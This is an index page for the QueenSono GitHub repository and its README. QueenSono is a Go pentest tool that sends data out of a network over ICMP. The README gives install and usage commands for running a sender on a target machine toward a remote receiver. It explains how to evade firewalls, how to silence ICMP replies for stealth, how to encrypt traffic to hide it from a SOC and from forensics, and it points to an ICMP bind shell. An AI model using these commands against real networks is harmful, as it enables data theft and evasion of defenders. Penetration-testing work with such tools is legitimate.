Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/ariary/QueenSono

Golang binary for data exfiltration with ICMP protocol (+ ICMP bindshell, http over ICMP tunneling, ...)
https://github.com/ariary/QueenSono

bindshell data-exfiltration golang icmp pentest pentest-tool tunneling

Last synced: 2 months ago
JSON representation

Golang binary for data exfiltration with ICMP protocol (+ ICMP bindshell, http over ICMP tunneling, ...)

Host: GitHub
URL: https://github.com/ariary/QueenSono
Owner: ariary
License: mit
Created: 2021-08-28T15:49:30.000Z (almost 3 years ago)
Default Branch: main
Last Pushed: 2021-12-10T10:18:54.000Z (over 2 years ago)
Last Synced: 2024-04-17T16:09:34.932Z (2 months ago)
Topics: bindshell, data-exfiltration, golang, icmp, pentest, pentest-tool, tunneling
Language: Go
Homepage:
Size: 11.4 MB
Stars: 135
Watchers: 5
Forks: 24
Open Issues: 3
Metadata Files:
- Readme: README.md
- License: LICENSE

Lists

awesome-pentest - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)
awesome-pentest-resource - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)
awesome-penetest - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)
awesome-pentest - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)
awesome-pentest - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)
awesome-pentest - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)
awesome-hacking-lists - ariary/QueenSono - Golang binary for data exfiltration with ICMP protocol (+ ICMP bindshell, http over ICMP tunneling, ...) (Go)
venom - `QueenSono` - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Forensics)
fucking-awesome-pentest - QueenSono - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case). (Exfiltration Tools / Zealandia)

README

        
QueenSono  ICMP Data Exfiltration 









A Golang Package for Data Exfiltration with ICMP protocol.




  QueenSono tool only relies on the fact that ICMP protocol isn't monitored. It is quite common. It could also been used within a system with basic ICMP inspection (ie. frequency and content length watcher) or to bypass authentication step with captive portal (used by many public Wi-Fi to authenticate users after connecting to the Wi-Fi e.g Airport Wi-Fi). Try to imitate PyExfil (and others) with the idea that the target machine does not necessary have python installed (so provide a binary could be useful)

  



  

    Install it

    ·

    Use it

    ·

    Notes

    ·

    Request Feature

    ·

    🎁

  



## Install

### With `curl`

*> From release*

```shell

curl -lO -L https://github.com/ariary/QueenSono/releases/latest/download/qsreceiver

curl -lO -L https://github.com/ariary/QueenSono/releases/latest/download/qssender

```

### With `go`

*> Via `go install`*

Make sure `$GOPATH` is in your `$PATH` before

Install `qssender`

```shell

go install github.com/ariary/QueenSono/cmd/client@latest

mv $GOPATH/bin/client $GOPATH/bin/qssender #rename binary

```

Install `qsreceiver`

```shell

go install github.com/ariary/QueenSono/cmd/server@latest

mv $GOPATH/bin/server $GOPATH/bin/qsreceiver #rename binary

```

*\> Install the binary from source*

 

Clone the repo and download the dependencies locally:

```    

git clone https://github.com/ariary/QueenSono.git

cd QueenSono

make before.build

```

 To build the ICMP packet sender `qssender` :

     build.queensono-sender

    

 To build the ICMP packet receiver `qsreceiver` :

     build.queensono-receiver

## Usage

`qssender` is the binary which will send ICMP packet  to the listener , so it is the binary you have to transfer on your target machine. 

`qsreceiver` is the listener on your local machine (or wherever you could receive icmp packet)

All commands and flags of the binaries could be found using `--help`

### Example 1: Send with "ACK" 🔙

*\> In this example we want to send a big file and look after echo reply to ackowledge the reception of the packets (ACK).*

![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono.gif)

On local machine:

    $ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt

  Explanation

    


    -l 0.0.0.0listen on all interfaces for ICMP packet

    

    

      -f received_bible.txt save received data in a file

    

    

-p show a progress bar of received data 


On target machine:

    $ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)

    $ qssender send file -d 2 -l 0.0.0.0 -r 10.0.0.92 -s 50000 bible.txt

  Explanation

    


    send file for sending file (bible.txt is the file in question)

    

    

      -d 2 send a packet each 2 seconds

    

    

-l 0.0.0.0 the listening address for echo reply 

    

-r 10.0.0.92 the address of my remote machine with qsreceiver listening

    

-s 50000 the data size I want to send in each packet


### Example 2: Send without "ACK" 🙈

*\> In this example we want to send a message without waiting for echo reply (it could be useful in  case the target firewall filters incoming icmp packet)*

![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono-trunc.gif?raw=true)

On local machine:

    $ qsreceiver receive truncated 1 -l 0.0.0.0

 

   Explanation

    


receive truncated 1 does not wait indefinitely if we don't received all the packets. (1 is the delay used with qssender)





for stealthiness you could prevent the kernel to reply to any ICMP pings

echo 1 | dd of=/proc/sys/net/ipv4/icmp_echo_ignore_all


On target machine:

    $ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 0.0.0.0 -r 10.0.0.190 -s 1 -N

  Explanation

    


    -N noreply option (don't wait for echo reply)

    


### Example 3: Send encrypted data 🔒

*\> In this example we want to send an encrypted message. As the command line could be spied on we use asymmetric encryption (if the key leaks, it isn't an issue so)*

![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono-encryption.gif)

On local machine:

    $ qsreceiver receive -l 0.0.0.0 --encrypt 

    

 

   Explanation

    


--encrypt  use encryption exchange. It will generate public/private key. The public one will be used by qssender to encrypt data, the private one is used to decrypt it with receiver



On target machine:

```

$ export MSG=""

$ export KEY=""

$ qssender send $MSG -d 1 -l 0.0.0.0 -r 10.0.0.190 -s 5 --key $KEY

```

  Explanation

    


    --key  provide key for data encryption. Use the one provided by the qsreceiver command

    


#### About encryption

RSA encrytion is used to keep data exchanged confidential. It could be useful for example to avoid a SoC to see what data is exchanged (or forensic) w/ basic analysis or simply for privacy.

But it comes with a cost. The choice of asymetric encryption is motivated by the fact that the encryption key is entered on the command line (so it could be retieved easily). Hence, we encrypt data with public key. Like this if someone retrieve the encryption key it will not be possible to decrypt the message. But the public key is smaller than the private one, so it ***encrypt smaller messages***. Also, ***it is computationally expensive***.

Another point, as we want to limit data size/ping requests (to avoid detection, bug, etc), **use encryption only if needed** ***as the message output-size will (should) always equal the size of the Modulus*** (part of the key) which is big.

##### Enhancement

Currently, the whole message is encrypted and then chunked to be sent. On the other side we wait for all the packet (chunks), reconstruct our message and then decrypt it.

But it works ⇔ we have received ALL the chunks, otherwise the decryption will fail.

=> We  could encrypt each chunk accordingly with the `-s` parameter, like this we could decrypt them separately.

### Bonus

See [hack](https://github.com/ariary/QueenSono/tree/main/hack) section for fun things with `QueenSono`:

* Bind shell using ICMP

* HTTP over ICMP tunneling

### Notes

- only work on Linux  (due to the use of golang net icmp package)

- need `cap_net_raw` capabilities

- if you actually send ICMP packets on 2 different machines and you wait for echo reply, be sure to use a reachable IP by remote as a listening address (do not use localhost or equivalent)